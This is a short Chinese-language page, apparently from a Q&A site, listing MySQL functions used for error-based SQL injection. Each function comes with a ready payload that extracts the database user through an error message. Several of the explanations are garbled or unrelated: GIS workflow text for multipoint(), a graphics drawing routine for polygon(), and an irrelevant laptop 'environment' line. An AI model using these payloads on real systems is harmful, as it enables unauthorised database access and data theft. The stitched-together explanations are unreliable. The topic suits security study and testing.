MySQL 報錯注入函數有哪些

MySQL 報錯注入函數有以下這些：

• floor()：其功能是“向下取整”，或者說“向下舍入”，即取不大于x的最大整數（與“四舍五入”不同，下取整是直接去掉小數部分）。

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

• extractvalue()：對XML文檔進行查詢的函數，其實就是相當于我們熟悉的HTML文件中用”div、p、a”標簽查找元素一樣。

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

• geometrycollection()：由于MYSQL無法用這樣字符串畫出圖形，所以會導致注入。

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

• multipoint()：在許多地理處理工作流中，您可能需要使用坐標和幾何信息運行特定操作，但不一定想經歷創建新（臨時）要素類、使用光標填充要素類、使用要素類，然后刪除臨時要素類的過程。可以使用幾何對象替代輸入和輸出，從而使地理處理變得更簡單。

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

• polygon()：該函數畫一個由直線相聞的兩個以上頂點組成的多邊形，用當前畫筆畫多邊形輪廓，用當前畫刷和多邊形填充模式填充多邊形。

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

• linestring()：LineString由Point值組成。您可以提取a的特定點LineString，計算其包含的點數，或獲取其長度。

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

• multilinestring()：該函數是因為sql語句無法解析該函數，則會導致報錯產生SQL注入。

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

• exp()：exp()函數表示以自然常數e為底的指數函數，exp(x)表示的是e的x次方，x可以是一個函數。指數函數是重要的基本初等函數之一。

select * from test where id=1 and exp(~(select * from(select user())a));

回答所涉及的環境：聯想天逸510S、Windows 10。